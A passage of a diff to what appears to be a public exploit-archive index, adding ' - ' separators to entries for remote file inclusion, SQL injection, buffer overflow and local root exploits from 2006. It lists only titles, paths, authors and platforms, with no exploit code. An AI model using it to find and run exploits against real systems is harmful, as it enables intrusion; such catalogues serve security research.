Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 +2623,platforms/php/webapps/2623.pl,"SourceForge <= 1.0.4 - (database.php) Remote File Include Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 +2624,platforms/php/webapps/2624.txt,"WiClear <= 0.10 - (path) Remote File Include Vulnerabilities",2006-10-23,"the master",php,webapps,0 +2625,platforms/windows/dos/2625.c,"QK SMTP <= 3.01 - (RCPT TO) Remote Denial of Service Exploit",2006-10-23,"Greg Linares",windows,dos,0 +2626,platforms/php/webapps/2626.txt,"MDweb <= 1.3 - (chemin_appli) Remote File Include Vulnerabilities",2006-10-23,Drago84,php,webapps,0 +2627,platforms/php/webapps/2627.txt,"Jaws <= 0.5.2 - (include/JawsDB.php) Remote File Include",2006-10-23,Drago84,php,webapps,0 +2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Include Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer (ADODB Execute) Denial of Service PoC",2006-10-24,"YAG KOHHA",windows,dos,0 -2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x (lib.editor.inc.php) Remote File Include",2006-10-24,"Mehmet Ince",php,webapps,0 +2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Include",2006-10-24,"Mehmet Ince",php,webapps,0 2631,platforms/php/webapps/2631.php,"Ascended Guestbook <= 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 -2632,platforms/php/webapps/2632.pl,"CMS Faethon <= 2.0 (mainpath) Remote File Include Exploit",2006-10-24,r0ut3r,php,webapps,0 +2632,platforms/php/webapps/2632.pl,"CMS Faethon <= 2.0 - (mainpath) Remote File Include Exploit",2006-10-24,r0ut3r,php,webapps,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - (swpackage) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - (swask) Format String Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 @@ -2330,214 +2330,214 @@ id,file,description,date,author,platform,type,port 2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143 2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator <= 4.1.7 / 4.7.2 - (FTP) Remote Exploit",2006-10-24,prdelka,hardware,remote,0 2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service Exploit",2006-10-24,"Evgeny Legerov",bsd,dos,0 -2640,platforms/php/webapps/2640.txt,"UeberProject <= 1.0 (login/secure.php) Remote File Include",2006-10-24,"Mehmet Ince",php,webapps,0 +2640,platforms/php/webapps/2640.txt,"UeberProject <= 1.0 - (login/secure.php) Remote File Include",2006-10-24,"Mehmet Ince",php,webapps,0 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - constructor Local Root Exploit",2006-10-24,"Marco Ivaldi",solaris,local,0 -2642,platforms/asp/webapps/2642.asp,"Berty Forum <= 1.4 (index.php) Remote Blind SQL Injection Exploit",2006-10-24,ajann,asp,webapps,0 +2642,platforms/asp/webapps/2642.asp,"Berty Forum <= 1.4 - (index.php) Remote Blind SQL Injection Exploit",2006-10-24,ajann,asp,webapps,0 2643,platforms/php/webapps/2643.php,"JaxUltraBB <= 2.0 Topic Reply Command Execution Exploit",2006-10-24,BlackHawk,php,webapps,0 2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK SQL Injection / Admin Credentials Disclosure Exploit",2006-10-25,rgod,php,webapps,0 -2645,platforms/php/webapps/2645.txt,"ArticleBeach Script <= 2.0 (index.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 -2646,platforms/php/webapps/2646.txt,"TextPattern <= 1.19 (publish.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 -2647,platforms/php/webapps/2647.php,"Imageview <= 5 (Cookie/index.php) Remote Local Include Exploit",2006-10-25,Kacper,php,webapps,0 +2645,platforms/php/webapps/2645.txt,"ArticleBeach Script <= 2.0 - (index.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 +2646,platforms/php/webapps/2646.txt,"TextPattern <= 1.19 - (publish.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 +2647,platforms/php/webapps/2647.php,"Imageview <= 5 - (Cookie/index.php) Remote Local Include Exploit",2006-10-25,Kacper,php,webapps,0 2648,platforms/php/webapps/2648.txt,"CommentIT (PathToComment) Remote File Include Vulnerabilities",2006-10-25,"Cold Zero",php,webapps,0 -2649,platforms/windows/remote/2649.c,"QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit",2006-10-25,Expanders,windows,remote,25 -2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x (RCPT TO) Remote Denial of Service Exploit",2006-10-25,"Greg Linares",windows,dos,0 +2649,platforms/windows/remote/2649.c,"QK SMTP <= 3.01 - (RCPT TO) Remote Buffer Overflow Exploit",2006-10-25,Expanders,windows,remote,25 +2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service Exploit",2006-10-25,"Greg Linares",windows,dos,0 2651,platforms/windows/remote/2651.c,"MiniHttpServer Web Forum & File Sharing Server 4.0 Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0 -2652,platforms/php/webapps/2652.htm,"Php League <= 0.81 (config.php) Remote File Include Exploit",2006-10-25,ajann,php,webapps,0 -2653,platforms/php/webapps/2653.txt,"MPCS <= 1.0 (path) Remote File Include Vulnerabilities",2006-10-26,v1per-haCker,php,webapps,0 +2652,platforms/php/webapps/2652.htm,"Php League <= 0.81 - (config.php) Remote File Include Exploit",2006-10-25,ajann,php,webapps,0 +2653,platforms/php/webapps/2653.txt,"MPCS <= 1.0 - (path) Remote File Include Vulnerabilities",2006-10-26,v1per-haCker,php,webapps,0 2654,platforms/php/webapps/2654.txt,"ask_rave <= 0.9 PR (end.php footfile) Remote File Include",2006-10-26,v1per-haCker,php,webapps,0 -2655,platforms/php/webapps/2655.php,"miniBB <= 2.0.2 (bb_func_txt.php) Remote File Include Exploit",2006-10-26,Kacper,php,webapps,0 +2655,platforms/php/webapps/2655.php,"miniBB <= 2.0.2 - (bb_func_txt.php) Remote File Include Exploit",2006-10-26,Kacper,php,webapps,0 2656,platforms/php/webapps/2656.txt,"MiniBill <= 20061010 - (menu_builder.php) File Include",2006-10-26,"Mehmet Ince",php,webapps,0 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 Popup Address Bar Spoofing Weakness",2006-10-26,anonymous,windows,remote,0 2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0 -2659,platforms/php/webapps/2659.php,"N/X WCMS <= 4.1 (nxheader.inc.php) Remote File Include Exploit",2006-10-27,Kacper,php,webapps,0 +2659,platforms/php/webapps/2659.php,"N/X WCMS <= 4.1 - (nxheader.inc.php) Remote File Include Exploit",2006-10-27,Kacper,php,webapps,0 2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - Remote SQL Injection",2006-10-27,w4ck1ng,php,webapps,0 -2661,platforms/asp/webapps/2661.asp,"Php League 0.82 (classement.php) Remote SQL Injection Exploit",2006-10-27,ajann,asp,webapps,0 +2661,platforms/asp/webapps/2661.asp,"Php League 0.82 - (classement.php) Remote SQL Injection Exploit",2006-10-27,ajann,asp,webapps,0 2662,platforms/asp/webapps/2662.txt,"Hosting Controller <= 6.1 Hotfix 3.2 - Remote Unauthenticated Vulnerabilities",2006-10-27,"Soroush Dalili",asp,webapps,0 2663,platforms/php/webapps/2663.txt,"PhpShop Core <= 0.9.0 RC1 - (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0 2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0beta (viewticket.php) Local Include Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0 2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Include",2006-10-28,"Mehmet Ince",php,webapps,0 -2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 (Core/core.inc.php) Remote File Include",2006-10-28,"Mehmet Ince",php,webapps,0 +2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - (Core/core.inc.php) Remote File Include",2006-10-28,"Mehmet Ince",php,webapps,0 2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include",2006-10-28,"Mehmet Ince",php,webapps,0 -2668,platforms/php/webapps/2668.htm,"MiraksGalerie <= 2.62 (pcltar.lib.php) Remote File Include Exploit",2006-10-28,ajann,php,webapps,0 +2668,platforms/php/webapps/2668.htm,"MiraksGalerie <= 2.62 - (pcltar.lib.php) Remote File Include Exploit",2006-10-28,ajann,php,webapps,0 2669,platforms/php/webapps/2669.php,"Free Image Hosting <= 1.0 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 2670,platforms/php/webapps/2670.php,"Free File Hosting <= 1.1 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit",2006-10-28,FistFuXXer,windows,remote,8028 2672,platforms/windows/dos/2672.py,"Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit",2006-10-28,h07,windows,dos,0 2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - (common.php) File Include",2006-10-29,"Mehmet Ince",php,webapps,0 -2674,platforms/php/webapps/2674.php,"MySource CMS <= 2.16.2 (init_mysource.php) Remote File Include Exploit",2006-10-29,Kacper,php,webapps,0 -2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit",2006-10-29,ajann,php,webapps,0 +2674,platforms/php/webapps/2674.php,"MySource CMS <= 2.16.2 - (init_mysource.php) Remote File Include Exploit",2006-10-29,Kacper,php,webapps,0 +2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - (index.php) Remote SQL Injection Exploit",2006-10-29,ajann,php,webapps,0 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 -2677,platforms/php/webapps/2677.asp,"Netref 4 (cat_for_aff.php) Source Code Disclosure Exploit",2006-10-29,ajann,php,webapps,0 -2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 (faq_reply.php) Remote File Include",2006-10-29,v1per-haCker,php,webapps,0 -2679,platforms/php/webapps/2679.txt,"PHPMyRing <= 4.2.1 (cherche.php) Remote SQL Injection",2006-10-29,ajann,php,webapps,0 +2677,platforms/php/webapps/2677.asp,"Netref 4 - (cat_for_aff.php) Source Code Disclosure Exploit",2006-10-29,ajann,php,webapps,0 +2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - (faq_reply.php) Remote File Include",2006-10-29,v1per-haCker,php,webapps,0 +2679,platforms/php/webapps/2679.txt,"PHPMyRing <= 4.2.1 - (cherche.php) Remote SQL Injection",2006-10-29,ajann,php,webapps,0 2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32)",2006-10-29,"Michael Thumann",windows,remote,80 -2681,platforms/php/webapps/2681.txt,"QnECMS <= 2.5.6 (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0 +2681,platforms/php/webapps/2681.txt,"QnECMS <= 2.5.6 - (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows NAT Helper Components Remote DoS Exploit (perl)",2006-10-30,x82,windows,dos,0 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement (key) Remote SQL Injection",2006-10-30,ajann,asp,webapps,0 -2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 (key) Remote SQL Injection",2006-10-30,ajann,asp,webapps,0 +2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) Remote SQL Injection",2006-10-30,ajann,asp,webapps,0 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a (includes/common.php) Remote Code Execution Exploit",2006-10-30,Kacper,php,webapps,0 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module <= 1.3.10 File Include Exploit",2006-10-30,Kacper,php,webapps,0 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 Login Bypass SQL Injection Exploit",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Include Vulnerabilities",2006-10-30,v1per-haCker,php,webapps,0 2689,platforms/windows/remote/2689.c,"Novell eDirectory <= 9.0 DHost Remote Buffer Overflow Exploit",2006-10-30,Expanders,windows,remote,0 2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80 -2691,platforms/php/webapps/2691.txt,"P-Book <= 1.17 (pb_lang) Remote File Inclusion Vulnerabilities",2006-10-31,Matdhule,php,webapps,0 +2691,platforms/php/webapps/2691.txt,"P-Book <= 1.17 - (pb_lang) Remote File Inclusion Vulnerabilities",2006-10-31,Matdhule,php,webapps,0 2692,platforms/php/webapps/2692.txt,"GEPI <= 1.4.0 gestion/savebackup.php Remote File Include",2006-10-31,"Sumit Siddharth",php,webapps,0 -2693,platforms/php/webapps/2693.txt,"PwsPHP <= 1.1 (themes/fin.php) Remote File Include Vulnerablity",2006-10-31,3l3ctric-Cracker,php,webapps,0 -2694,platforms/php/webapps/2694.php,"T.G.S. CMS <= 0.1.7 (logout.php) Remote SQL Injection Exploit",2006-10-31,Kacper,php,webapps,0 -2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/ 2.0 (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0 -2696,platforms/php/webapps/2696.php,"Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 -2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 +2693,platforms/php/webapps/2693.txt,"PwsPHP <= 1.1 - (themes/fin.php) Remote File Include Vulnerablity",2006-10-31,3l3ctric-Cracker,php,webapps,0 +2694,platforms/php/webapps/2694.php,"T.G.S. CMS <= 0.1.7 - (logout.php) Remote SQL Injection Exploit",2006-10-31,Kacper,php,webapps,0 +2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/ 2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0 +2696,platforms/php/webapps/2696.php,"Invision Power Board <= 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 +2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 - (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server <= 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept",2006-11-01,"H D Moore",hardware,dos,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure",2006-11-01,securfrog,php,webapps,0 2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0 -2703,platforms/php/webapps/2703.txt,"Article System 0.6 (volume.php) Remote File Include",2006-11-02,GregStar,php,webapps,0 +2703,platforms/php/webapps/2703.txt,"Article System 0.6 - (volume.php) Remote File Include",2006-11-02,GregStar,php,webapps,0 2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 - (FCKeditor) Remote File Include",2006-11-03,nuffsaid,php,webapps,0 -2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0 +2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 - (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0 2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0 2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0 2710,platforms/php/webapps/2710.txt,"Ariadne <= 2.4 - store_config[code] Remote File Include Vulnerabilities",2006-11-04,"Mehmet Ince",php,webapps,0 2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0 -2712,platforms/php/webapps/2712.php,"MDPro <= 1.0.76 (Cookie: PNSVlang) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0 +2712,platforms/php/webapps/2712.php,"MDPro <= 1.0.76 - (Cookie: PNSVlang) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion",2006-11-04,GregStar,php,webapps,0 -2714,platforms/php/webapps/2714.pl,"PHPKIT <= 1.6.1R2 (search_user) Remote SQL Injection Exploit",2006-11-04,x23,php,webapps,0 +2714,platforms/php/webapps/2714.pl,"PHPKIT <= 1.6.1R2 - (search_user) Remote SQL Injection Exploit",2006-11-04,x23,php,webapps,0 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server <= 5.2.1 - Remote Denial of Service Exploit",2006-11-04,boecke,windows,dos,0 -2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 (GET Request) Remote DoS Exploit",2006-11-04,CorryL,windows,dos,0 -2717,platforms/php/webapps/2717.txt,"phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities",2006-11-04,DeltahackingTEAM,php,webapps,0 -2718,platforms/php/webapps/2718.txt,"SazCart <= 1.5 (cart.php) Remote File Include",2006-11-04,IbnuSina,php,webapps,0 -2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0 -2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0 +2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - (GET Request) Remote DoS Exploit",2006-11-04,CorryL,windows,dos,0 +2717,platforms/php/webapps/2717.txt,"phpDynaSite <= 3.2.2 - (racine) Remote File Include Vulnerabilities",2006-11-04,DeltahackingTEAM,php,webapps,0 +2718,platforms/php/webapps/2718.txt,"SazCart <= 1.5 - (cart.php) Remote File Include",2006-11-04,IbnuSina,php,webapps,0 +2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 - (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0 +2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 - (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 -2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0 +2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 - (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Include",2006-11-06,the_day,php,webapps,0 -2727,platforms/php/webapps/2727.txt,"OpenEMR <= 2.8.1 (srcdir) Multiple Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 -2728,platforms/php/webapps/2728.txt,"Article Script <= 1.6.3 (rss.php) Remote SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 -2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 (nfsd.exe) Remote Stack Overflow Exploit (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049 +2727,platforms/php/webapps/2727.txt,"OpenEMR <= 2.8.1 - (srcdir) Multiple Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 +2728,platforms/php/webapps/2728.txt,"Article Script <= 1.6.3 - (rss.php) Remote SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 +2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - (nfsd.exe) Remote Stack Overflow Exploit (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049 2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service Exploit (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0 2731,platforms/php/webapps/2731.pl,"iPrimal Forums (admin/index.php) Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Include",2006-11-06,ajann,php,webapps,0 -2733,platforms/php/webapps/2733.txt,"iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 -2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC",2006-11-07,"Joxean Koret",windows,dos,0 +2733,platforms/php/webapps/2733.txt,"iWare Pro <= 5.0.4 - (chat_panel.php) Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 +2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - (APPE) Remote Buffer Overflow PoC",2006-11-07,"Joxean Koret",windows,dos,0 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service Exploit",2006-11-07,"Joxean Koret",windows,dos,0 -2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 (ad_main.php) Remote File Include",2006-11-07,HER0,php,webapps,0 +2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - (ad_main.php) Remote File Include",2006-11-07,HER0,php,webapps,0 2737,platforms/osx/local/2737.pl,"Xcode OpenBase <= 10.0.0 - (symlink) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 2738,platforms/osx/local/2738.pl,"Xcode OpenBase <= 10.0.0 - (unsafe system call) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 2739,platforms/php/webapps/2739.txt,"iPrimal Forums (admin/index.php) Remote File Include",2006-11-08,Bl0od3r,php,webapps,0 -2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities",2006-11-08,DeltahackingTEAM,php,webapps,0 -2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 (inc/irayofuncs.php) Remote File Include",2006-11-08,DeltahackingTEAM,php,webapps,0 +2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Include Vulnerabilities",2006-11-08,DeltahackingTEAM,php,webapps,0 +2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - (inc/irayofuncs.php) Remote File Include",2006-11-08,DeltahackingTEAM,php,webapps,0 2742,platforms/php/webapps/2742.txt,"DodosMail <= 2.0.1 - (dodosmail.php) Remote File Include",2006-11-08,"Cold Zero",php,webapps,0 -2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit",2006-11-08,anonymous,windows,remote,0 +2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution Exploit",2006-11-08,anonymous,windows,remote,0 2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Include",2006-11-09,v1per-haCker,php,webapps,0 -2745,platforms/php/webapps/2745.txt,"gtcatalog <= 0.9.1 (index.php) Remote File Include",2006-11-09,v1per-haCker,php,webapps,0 -2746,platforms/asp/webapps/2746.pl,"AspPired2Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit",2006-11-09,ajann,asp,webapps,0 -2747,platforms/php/webapps/2747.txt,"MyAlbum <= 3.02 (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 -2748,platforms/php/webapps/2748.pl,"phpManta <= 1.0.2 (view-sourcecode.php) Local File Include Exploit",2006-11-09,ajann,php,webapps,0 -2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit (2)",2006-11-10,~Fyodor,windows,remote,0 -2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 (core/core.php) Remote File Include",2006-11-10,Firewall,php,webapps,0 -2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0 +2745,platforms/php/webapps/2745.txt,"gtcatalog <= 0.9.1 - (index.php) Remote File Include",2006-11-09,v1per-haCker,php,webapps,0 +2746,platforms/asp/webapps/2746.pl,"AspPired2Poll <= 1.0 - (MoreInfo.asp) Remote SQL Injection Exploit",2006-11-09,ajann,asp,webapps,0 +2747,platforms/php/webapps/2747.txt,"MyAlbum <= 3.02 - (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 +2748,platforms/php/webapps/2748.pl,"phpManta <= 1.0.2 - (view-sourcecode.php) Local File Include Exploit",2006-11-09,ajann,php,webapps,0 +2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution Exploit (2)",2006-11-10,~Fyodor,windows,remote,0 +2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - (core/core.php) Remote File Include",2006-11-10,Firewall,php,webapps,0 +2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - (printLog.php) Remote SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0 2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce <= 3.0.1 - Remote Include",2006-11-10,SlimTim10,php,webapps,0 -2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit (3)",2006-11-10,M03,windows,remote,0 -2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 -2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 -2756,platforms/asp/webapps/2756.txt,"NuStore 1.0 (Products.asp) Remote SQL Injection",2006-11-11,ajann,asp,webapps,0 -2757,platforms/asp/webapps/2757.pl,"NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 -2758,platforms/php/webapps/2758.php,"phpwcms <= 1.2.6 (Cookie: wcs_user_lang) Local File Include Exploit",2006-11-11,Kacper,php,webapps,0 -2759,platforms/php/webapps/2759.php,"PHPWind <= 5.0.1 (AdminUser) Remote Blind SQL Injection Exploit",2006-11-12,rgod,php,webapps,0 -2760,platforms/php/webapps/2760.php,"Rama CMS <= 0.68 (Cookie: lang) Local File Include Exploit",2006-11-12,Kacper,php,webapps,0 -2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit",2006-11-12,ajann,asp,webapps,0 -2762,platforms/asp/webapps/2762.asp,"ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit",2006-11-12,ajann,asp,webapps,0 -2763,platforms/asp/webapps/2763.txt,"UStore 1.0 (detail.asp) Remote SQL Injection",2006-11-12,ajann,asp,webapps,0 -2764,platforms/asp/webapps/2764.txt,"USupport 1.0 (detail.asp) Remote SQL Injection",2006-11-12,ajann,asp,webapps,0 -2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 (viewarticle.asp) Remote SQL Injection",2006-11-12,ajann,asp,webapps,0 +2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution Exploit (3)",2006-11-10,M03,windows,remote,0 +2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - (cl_CatListing.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 +2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - (propertysdetails.asp) Remote SQL Injection 